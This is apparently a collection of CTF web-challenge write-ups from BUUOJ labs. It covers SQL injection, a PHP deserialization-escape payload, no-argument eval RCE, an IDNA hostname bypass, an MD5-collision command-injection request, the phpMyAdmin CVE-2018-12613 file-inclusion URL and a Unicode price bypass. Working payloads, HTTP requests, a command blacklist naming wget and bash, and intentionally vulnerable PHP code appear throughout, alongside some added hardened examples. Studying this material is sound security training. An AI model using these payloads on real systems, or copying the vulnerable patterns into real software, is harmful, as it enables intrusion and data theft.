MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
# base32
c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==
# base64
select * from user where username = '$name'
```
If nobody tells you, the full code logic of this challenge is a bit of a trap.
The code below is from the BUU deployment; I don't know whether it was available during the actual competition.
```php
<!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5-->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Do you know who am I?</title>
<?php
require "config.php";
require "flag.php";
if (get_magic_quotes_gpc()) {
    function stripslashes_deep($value) {
        $value = is_array($value) ? array_map('stripslashes_deep', $value) : stripslashes($value);
        return $value;
    }
    $_POST = array_map('stripslashes_deep', $_POST);
    $_GET = array_map('stripslashes_deep', $_GET);
    $_COOKIE = array_map('stripslashes_deep', $_COOKIE);
    $_REQUEST = array_map('stripslashes_deep', $_REQUEST);
}
mysqli_query($con, 'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '" . $name . "'";
$result = mysqli_query($con, $sql);
if (preg_match("/\(|\)|\=|or/", $name)) {
    die("do not hack me!");
} else {
    if (!$result) {
        printf("Error: %s\n", mysqli_error($con));
        exit();
    } else {
        $arr = mysqli_fetch_row($result);
        if ($arr[1] == "admin") {
            if (md5($password) == $arr[2]) {
                echo $flag;
            } else {
                die("wrong pass!");
            }
        } else {
            die("wrong user!");
        }
    }
}
?>
```
The verification logic of this challenge:

1. Query the user record with username = $user and turn it into an array.
2. If $user matches the blacklist, report an error.
3. Otherwise, check whether md5($pw) == password.
4. On success, return the flag.

Approach: inject a row of our own into the result set obtained in step 1, e.g.:
```
mysql> select 'admin',md5('fe1w0');
+-------+----------------------------------+
| admin | md5('fe1w0')                     |
+-------+----------------------------------+
| admin | d49fd2c918d8ab7c3b8111269023f888 |
+-------+----------------------------------+
1 row in set (0.00 sec)
```
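Added illustration, not the challenge's code: the login decision above rebuilt on an in-memory SQLite table so that the concatenated query and a parameterized one can be compared side by side. The table contents, the placeholder admin password, the function names and the UNION payload are constructed for this example; SQLite takes `--` as the comment where MySQL would take `#`.

```python
import hashlib
import sqlite3


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the challenge's user table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (id INTEGER, username TEXT, password TEXT)")
    # placeholder admin password: the attacker never learns it
    con.execute("INSERT INTO user VALUES (1, 'admin', ?)",
                (md5hex("placeholder-admin-password"),))
    return con


def check_row(row, password: str) -> str:
    """Decision logic shared by both versions (mirrors the PHP above)."""
    if row is None or row[1] != "admin":
        return "wrong user!"
    return "flag" if md5hex(password) == row[2] else "wrong pass!"


def vulnerable_login(con, name: str, password: str) -> str:
    # string concatenation, exactly how the challenge builds $sql
    sql = f"select * from user where username = '{name}'"
    return check_row(con.execute(sql).fetchone(), password)


def hardened_login(con, name: str, password: str) -> str:
    # bound parameter: the name can only ever be compared as data
    row = con.execute("select * from user where username = ?", (name,)).fetchone()
    return check_row(row, password)


# Constructed UNION payload of the kind the write-up describes: it makes the
# first row of the result set a fabricated (id, 'admin', md5) triple whose
# password column is the hash of a value the sender chose.
PAYLOAD = "' union select 1,'admin','" + md5hex("fe1w0") + "'-- "


if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", vulnerable_login(con, PAYLOAD, "fe1w0"))
    print("hardened:  ", hardened_login(con, PAYLOAD, "fe1w0"))
```

The fabricated row is accepted because the password check compares against whatever the query returned, and the query was under the sender's control. With a bound parameter the same string is just a username that does not exist. Note also that the challenge runs the query before the blacklist check, so the blacklist never protects the query at all.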
[GYCTF2020]Blacklist
```php
return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i", $inject);
```
MySQL query statement: HANDLER
```
http://d819a190-8282-41a9-90a8-72af5b375e27.node3.buuoj.cn/?inject=-1';HANDLER FlagHere OPEN;HANDLER FlagHere READ FIRST;
```
[0CTF 2016]piapiapia

```
PS D:\fe1w0\tool\web & permeation\dirpath_search\dirsearch> python3 .\dirsearch.py -u "http://6e4630e8-a6e7-4e79-8b69-cc8f03111332.node3.buuoj.cn/" -e php --delay=0.5
```
The scan results reveal the www.zip file.

Rough execution flow:

- register
- login: obtains a session
- update: updates personal information and serializes the profile
- profile: unserializes the serialized profile

Vulnerability:
```php
public function update($table, $key, $value, $where) {
    $sql = "UPDATE $table SET $key = '$value' WHERE $where";
    return mysql_query($sql);
}

public function filter($string) {
    $escape = array('\'', '\\\\');
    $escape = '/' . implode('|', $escape) . '/';
    $string = preg_replace($escape, '_', $string);

    $safe = array('select', 'insert', 'update', 'delete', 'where');
    $safe = '/' . implode('|', $safe) . '/i';
    return preg_replace($safe, 'hacker', $string);
}
```
```php
public function show_profile($username) {
    $username = parent::filter($username);

    $where = "username = '$username'";
    $object = parent::select($this->table, $where);
    return $object->profile;
}

public function update_profile($username, $new_profile) {
    $username = parent::filter($username);
    $new_profile = parent::filter($new_profile);

    $where = "username = '$username'";
    return parent::update($this->table, 'profile', $new_profile, $where);
}
```
```php
<?php
require_once('class.php');
if ($_SESSION['username'] == null) {
    die('Login First');
}
$username = $_SESSION['username'];
$profile = $user->show_profile($username);
if ($profile == null) {
    header('Location: update.php');
} else {
    $profile = unserialize($profile);
    $phone = $profile['phone'];
    $email = $profile['email'];
    $nickname = $profile['nickname'];
    $photo = base64_encode(file_get_contents($profile['photo']));
?>
```
```php
<?php
require_once('class.php');
if ($_SESSION['username'] == null) {
    die('Login First');
}
if ($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {
    $username = $_SESSION['username'];
    if (!preg_match('/^\d{11}$/', $_POST['phone']))
        die('Invalid phone');

    if (!preg_match('/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\.[_a-zA-Z0-9]{1,10}$/', $_POST['email']))
        die('Invalid email');

    if (preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
        die('Invalid nickname');

    $file = $_FILES['photo'];
    if ($file['size'] < 5 or $file['size'] > 1000000)
        die('Photo size error');

    move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
    $profile['phone'] = $_POST['phone'];
    $profile['email'] = $_POST['email'];
    $profile['nickname'] = $_POST['nickname'];
    $profile['photo'] = 'upload/' . md5($file['name']);

    $user->update_profile($username, serialize($profile));
    echo 'Update Profile Success!<a href="profile.php">Your Profile</a>';
} else {
?>
```
A normal PHP serialization:
```
a:4:{s:5:"phone";i:12345678901;s:5:"email";s:11:"123@123.com";s:8:"nickname";a:1:{i:0;s:12:"xzasxzasxzas";}s:5:"photo";s:39:"upload/405ccd25d52f1fbf76ba04be9a371afd";}
```
The PHP serialization we want:
```
a:4:{s:5:"phone";i:12345678901;s:5:"email";s:11:"123@123.com";s:8:"nickname";a:1:{i:0;s:12:"xzasxzasxzas";}s:5:"photo";s:10:"config.php";}
```
First consider only the serialize/unserialize process, assuming nothing is altered during the upload step.
```php
<?php
$profile['phone'] = 12345678901;
$profile['email'] = "123@123.com";
$profile['nickname'] = ['xzasxzasxzas";}s:5:"photo";s:10:"config.php'];
$profile['photo'] = 'upload/' . md5("xzas");

echo serialize($profile);
```
Because the serialized nickname has length 43, unserialize reads all the way to the closing `;`, and we do not get the result we want:
```
s:43:"xzasxzasxzas";}s:5:"photo";s:10:"config.php";
```
However, update_profile() filters its parameters before running (see class.php, class mysql->filter()), replacing blacklisted words with `hacker`, and this changes the length of the serialized result. For example `where` -> `hacker` makes the actual string one character longer while the `s:xx` length prefix in the serialized data stays the same, which leads to a PHP deserialization escape.

Since the string that needs to be pushed out is 31 characters long, 31 copies of `where` are enough.
```
php > $a = '";}s:5:"photo";s:10:"config.php';
php > echo strlen($a);
31
```
```php
<?php
$profile['phone'] = 12345678901;
$profile['email'] = "123@123.com";
$profile['nickname'] = ['wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php'];
$profile['photo'] = 'upload/' . md5("xzas");

function filter($string) {
    $escape = array('\'', '\\\\');
    $escape = '/' . implode('|', $escape) . '/';
    $string = preg_replace($escape, '_', $string);

    $safe = array('select', 'insert', 'update', 'delete', 'where');
    $safe = '/' . implode('|', $safe) . '/i';
    return preg_replace($safe, 'hacker', $string);
}

echo serialize($profile);
echo "\n";
echo filter(serialize($profile));
echo "\n";
print_r(unserialize(filter(serialize($profile))));
```
```http
POST /update.php HTTP/1.1
Host: 6e4630e8-a6e7-4e79-8b69-cc8f03111332.node3.buuoj.cn
Content-Length: 171589
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://6e4630e8-a6e7-4e79-8b69-cc8f03111332.node3.buuoj.cn
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryq1cAFarAvJr8wA7F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4204.0 Safari/537.36 Edg/86.0.587.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://6e4630e8-a6e7-4e79-8b69-cc8f03111332.node3.buuoj.cn/update.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=fcce49634c704a465362161ce527a768
Connection: close

------WebKitFormBoundaryq1cAFarAvJr8wA7F
Content-Disposition: form-data; name="phone"

12345678901
------WebKitFormBoundaryq1cAFarAvJr8wA7F
Content-Disposition: form-data; name="email"

123@123.com
------WebKitFormBoundaryq1cAFarAvJr8wA7F
Content-Disposition: form-data; name="nickname[]"

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php
```
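To make the length mismatch concrete, here is an added Python model of the serialize -> filter -> unserialize pipeline (not the challenge's code, nor the write-up's): a small PHP serialize()/unserialize() for ints, ASCII strings and arrays, the challenge's filter() ported to Python, the padding rule from the write-up, and the same pipeline with the filter moved before serialization, which is the fix. The function names, the `padded_nickname` helper and the in-memory profile are mine; the injected suffix is the 31-character string shown above.

```python
import hashlib
import re


def php_serialize(v) -> str:
    """Serialize an int, ASCII str, list or dict the way PHP's serialize() does."""
    if isinstance(v, int):
        return f"i:{v};"
    if isinstance(v, str):
        return f's:{len(v)}:"{v}";'      # PHP counts bytes; ASCII assumed here
    if isinstance(v, list):
        v = dict(enumerate(v))
    body = "".join(php_serialize(k) + php_serialize(x) for k, x in v.items())
    return f"a:{len(v)}:{{{body}}}"


def php_unserialize(data: str):
    """Parse the same subset. Like PHP, s:N reads exactly N bytes without
    inspecting them, and anything after the top-level value is ignored;
    both properties are what the escape relies on."""
    pos = 0

    def parse():
        nonlocal pos
        t = data[pos]
        if t == "i":
            end = data.index(";", pos)
            val = int(data[pos + 2:end])
            pos = end + 1
            return val
        if t == "s":
            colon = data.index(":", pos + 2)
            n = int(data[pos + 2:colon])
            start = colon + 2                       # skip :"
            val = data[start:start + n]
            if data[start + n:start + n + 2] != '";':
                raise ValueError(f"bad string terminator at {start + n}")
            pos = start + n + 2
            return val
        if t == "a":
            colon = data.index(":", pos + 2)
            n = int(data[pos + 2:colon])
            pos = colon + 2                         # skip :{
            out = {}
            for _ in range(n):
                k = parse()
                out[k] = parse()
            if data[pos] != "}":
                raise ValueError(f"bad array terminator at {pos}")
            pos += 1
            return out
        raise ValueError(f"unsupported type {t!r} at {pos}")

    return parse()


def page_filter(s: str) -> str:
    """The challenge's mysql::filter(): ' and \\ become _, keywords become hacker."""
    s = re.sub(r"'|\\", "_", s)
    return re.sub(r"select|insert|update|delete|where", "hacker", s, flags=re.I)


INJECT = '";}s:5:"photo";s:10:"config.php'   # 31 chars, as counted above


def padded_nickname(suffix: str, word: str = "where") -> str:
    """'where' -> 'hacker' grows by one byte per copy, so len(suffix) copies
    push exactly len(suffix) bytes of the suffix past the declared s:N."""
    return word * len(suffix) + suffix


def build_profile(nickname: str) -> dict:
    """Constructed profile matching the write-up's test script."""
    return {"phone": 12345678901, "email": "123@123.com",
            "nickname": [nickname],
            "photo": "upload/" + hashlib.md5(b"xzas").hexdigest()}


def vulnerable_roundtrip(profile: dict) -> dict:
    # update.php order: serialize first, then filter the whole blob
    return php_unserialize(page_filter(php_serialize(profile)))


def hardened_roundtrip(profile: dict) -> dict:
    # Filter each field first, then serialize, so every s:N matches its content
    clean = {k: ([page_filter(x) for x in v] if isinstance(v, list)
                 else page_filter(v) if isinstance(v, str) else v)
             for k, v in profile.items()}
    return php_unserialize(php_serialize(clean))
```

In the vulnerable order the declared length 186 is consumed entirely by the 31 `hacker`s, the suffix then terminates the string and the nickname array, and the injected `photo` key replaces the real one; the original `photo` becomes trailing data that unserialize never looks at. Filtering before serialization keeps the length prefix and the content in agreement, and the suffix stays an inert part of the nickname.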
[GXYCTF2019]禁止套娃
```
python .\git_extract.py "http://26f894ca-16f4-48bb-8e21-af104be9918b.node3.buuoj.cn/.git/"
```
```php
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if (isset($_GET['exp'])) {
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if (';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                @eval($_GET['exp']);
            } else {
                die("还差一点哦!");
            }
        } else {
            die("再好好想想!");
        }
    } else {
        die("还想读flag,臭弟弟!");
    }
}
?>
```
https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE
https://www.cnblogs.com/wangtanzhi/p/12260986.html
Here I use highlight_file(session_id(session_start())); to pass; other methods can be found in the links above.
```python
import requests

url = 'http://26f894ca-16f4-48bb-8e21-af104be9918b.node3.buuoj.cn/?exp=highlight_file(session_id(session_start()));'
payload = "flag.php"
cookies = {'PHPSESSID': payload}
r = requests.get(url=url, cookies=cookies)
print(r.content)
```
[SUCTF 2019]Pythonginx
源码:https://github.com/team-su/SUCTF-2019/blob/master/Web/pythonginx
Source code and hints:
<!-- Dont worry about the suctf.cc. Go on! -->
<!-- Do you know the nginx? -->
```python
@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"
```
参考:https://blog.csdn.net/qq_42181428/article/details/99741920
The first two if checks must be bypassed while the third one must be satisfied in order to read the file.
Use knowledge points 1 and 2 to construct the payload.
```python
for i in range(128, 65537):
    tmp = chr(i)
    try:
        res = tmp.encode('idna').decode('utf-8')
        if "-" in res:
            continue
        print("U:{} A:{} ascii:{}".format(tmp, res, i))
    except:
        pass
```
- Configuration directory: /etc/nginx
- Main configuration file: /etc/nginx/conf/nginx.conf
- Service unit: /usr/lib64/systemd/system/nginx.service
- Modules: /usr/lib64/nginx/modules
- Binary: /usr/sbin/nginx
- Default web root: /usr/share/nginx/html
- Default log directory: /var/log/nginx
- Configuration file (source install): /usr/local/nginx/conf/nginx.conf
https://www.cnblogs.com/wangtanzhi/p/12181032.html
```
file://suctf.c℆sr/local/nginx/conf/nginx.conf
file://suctf.ⒸⒸ/usr/local/nginx/conf/nginx.conf
```

```nginx
server {
    listen 80;
    location / {
        try_files $uri @app;
    }
    location @app {
        include uwsgi_params;
        uwsgi_pass unix:///tmp/uwsgi.sock;
    }
    location /static {
        alias /app/static;
    }
    # location /flag {
    #     alias /usr/fffffflag;
    # }
}
```
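As an added example (not from the challenge repository or this write-up), the three checks above rewritten as a pure function so they can be exercised without a server, next to a version that canonicalizes the host once and decides only on the canonical form, treating suctf.cc as the host the first two checks try to deny. The function names, the decision labels and the example URLs are mine; `idna_host` does exactly what the challenge's loop does.

```python
from urllib.parse import urlparse, urlsplit, urlunsplit

TARGET = "suctf.cc"


def idna_host(host: str) -> str:
    """Per-label IDNA encoding, as the challenge does it (nameprep/NFKC folds
    look-alike code points such as U+2102 into plain ASCII letters)."""
    return ".".join(h.encode("idna").decode("utf-8") for h in host.split("."))


def vulnerable_gate(url: str):
    """The challenge's three checks. Returns (decision, url that would be fetched)."""
    if urlparse(url).hostname == TARGET:          # check 1: pre-IDNA hostname
        return "blocked-1", None
    parts = list(urlsplit(url))
    if parts[1] == TARGET:                         # check 2: pre-IDNA netloc
        return "blocked-2", None
    parts[1] = idna_host(parts[1])                 # representation changes here
    final = urlunsplit(parts).split(" ")[0]
    if urlparse(final).hostname == TARGET:         # check 3: post-IDNA hostname
        return "fetch", final
    return "blocked-3", None


def hardened_gate(url: str):
    """Canonicalize first, decide once on the canonical host, and fetch the
    canonical URL, so check and use never see different strings."""
    try:
        parts = list(urlsplit(url))
        parts[1] = idna_host(parts[1])
    except (ValueError, UnicodeError):
        return "blocked-bad-host", None
    final = urlunsplit(parts)
    if urlparse(final).hostname == TARGET:
        return "blocked-denied", None
    return "fetch", final


if __name__ == "__main__":
    for u in ["http://suctf.cc/x", "http://suctf.\u2102c/x", "http://example.com/x"]:
        print(u, "->", vulnerable_gate(u), "|", hardened_gate(u))
```

The vulnerable version compares three different strings: the raw hostname, the raw netloc and the IDNA-encoded hostname, so a look-alike such as U+2102 passes the first two and then becomes `suctf.cc` for the third. Note that current CPython's urlsplit() raises ValueError for a netloc whose NFKC form introduces `/`, `?`, `#`, `@` or `:` (bpo-36216), which is why the `℆` payload above no longer even parses there, but code-point substitutions that fold to plain letters still do, so the canonicalize-then-check pattern is what actually closes the gap.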
[安洵杯 2019]easy_web
https://github.com/D0g3-Lab/i-SOON_CTF_2019/tree/master/Web/easy_web
```http
GET /index.php?img=TmprMlpUWTBOalUzT0RKbE56QTJPRGN3&cmd= HTTP/1.1
Host: 647f9c79-b48c-4728-9de0-46bfb66380bd.node3.buuoj.cn
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4204.0 Safari/537.36 Edg/86.0.587.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
```
```php
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['c md'];
```

(The line above is a transcription aid only; the real source follows.)

```php
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));

$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}

?>
<html>
<style>
  body{
   background:url(./bj.png)  no-repeat center center;
   background-size:cover;
   background-attachment:fixed;
   background-color:
  }
</style>
<body>
</body>
</html>
```
```http
POST /index.php?img=&cmd=ca\t%20/flag HTTP/1.1
Host: 647f9c79-b48c-4728-9de0-46bfb66380bd.node3.buuoj.cn
Content-Length: 773
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4204.0 Safari/537.36 Edg/86.0.587.0
Origin: http://647f9c79-b48c-4728-9de0-46bfb66380bd.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://647f9c79-b48c-4728-9de0-46bfb66380bd.node3.buuoj.cn/index.php?img=&cmd=ca\t%20/flag
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

a=%d1%31%dd%02%c5%e6%ee%c4%69%3d%9a%06%98%af%f9%5c%2f%ca%b5%07%12%46%7e%ab%40%04%58%3e%b8%fb%7f%89%55%ad%34%06%09%f4%b3%02%83%e4%88%83%25%f1%41%5a%08%51%25%e8%f7%cd%c9%9f%d9%1d%bd%72%80%37%3c%5b%d8%82%3e%31%56%34%8f%5b%ae%6d%ac%d4%36%c9%19%c6%dd%53%e2%34%87%da%03%fd%02%39%63%06%d2%48%cd%a0%e9%9f%33%42%0f%57%7e%e8%ce%54%b6%70%80%28%0d%1e%c6%98%21%bc%b6%a8%83%93%96%f9%65%ab%6f%f7%2a%70&b=%d1%31%dd%02%c5%e6%ee%c4%69%3d%9a%06%98%af%f9%5c%2f%ca%b5%87%12%46%7e%ab%40%04%58%3e%b8%fb%7f%89%55%ad%34%06%09%f4%b3%02%83%e4%88%83%25%71%41%5a%08%51%25%e8%f7%cd%c9%9f%d9%1d%bd%f2%80%37%3c%5b%d8%82%3e%31%56%34%8f%5b%ae%6d%ac%d4%36%c9%19%c6%dd%53%e2%b4%87%da%03%fd%02%39%63%06%d2%48%cd%a0%e9%9f%33%42%0f%57%7e%e8%ce%54%b6%70%80%a8%0d%1e%c6%98%21%bc%b6%a8%83%93%96%f9%65%2b%6f%f7%2a%70
```
[GWCTF 2019]我有一个数据库
phpMyAdmin 4.8.1 arbitrary file inclusion, CVE-2018-12613
https://blog.csdn.net/qq_33020901/article/details/80829269
https://blog.51cto.com/13770310/2131305?source=dra
```sql
show variables like 'datadir';
```
```
http://e733f3ba-a431-4612-8a5e-3458d4c9cb30.node3.buuoj.cn/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../flag
```
[BJDCTF2020]Mark loves cat
https://github.com/BjdsecCA/BJDCTF2020
I recommend using GitHack; the previous tool had problems.
```php
<?php
include 'flag.php';
$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach ($_POST as $x => $y) {
    $$x = $y;
}

foreach ($_GET as $x => $y) {
    $$x = $$y;
}

foreach ($_GET as $x => $y) {
    if ($_GET['flag'] === $x && $x !== 'flag') {
        exit($handsome);
    }
}

if (!isset($_GET['flag']) && !isset($_POST['flag'])) {
    exit($yds);
}

if ($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag') {
    exit($is);
}

echo "the flag is: " . $flag;
```
```php
<?php
$flag = file_get_contents('/flag');
```

```
GET /index.html?yds=flag
```
[ASIS 2019]Unicorn shop
Similar to [SUCTF 2019]Pythonginx.
Items 1-3 are probably not present in the challenge; only item 4 remains.
You can search at https://www.compart.com/en/unicode/search?q=thousand#characters
```http
POST /charge HTTP/1.1
Host: 39cdace4-94e5-49c3-a6fb-796279314616.node3.buuoj.cn
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://39cdace4-94e5-49c3-a6fb-796279314616.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4204.0 Safari/537.36 Edg/86.0.587.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://39cdace4-94e5-49c3-a6fb-796279314616.node3.buuoj.cn/charge
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

id=4&price=%25E2%2586%2588
```

```http
HTTP/1.1 200 OK
Server: openresty
Date: Sat, 01 Aug 2020 20:15:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 2572
Connection: close

<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8"><!--Ah,really important,seriously. -->
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Unicorn shop</title>
    <!-- Don't be frustrated by the same view,we've changed the challenge content.-->
    <!-- Bootstrap core CSS -->
    <link href="/static/css/bootstrap.min.css?v=ec3bb52a00e176a7181d454dffaea219" rel="stylesheet">
    <!-- Custom styles for this template -->
    <link href="/static/css/jumbotron-narrow.css?v=166844ff66a82256d62737c8a6fc14bf" rel="stylesheet">
</head>
<!--We still have some surprise for admin.password-->
<body>
<div class="container">
    <div class="alert alert-success alert-dismissable">
        操作成功。
    </div>
    <div class="alert alert-success alert-dismissable">
        flag{20386a66-bd60-4439-962d-962f7d6122fd}
    </div>
```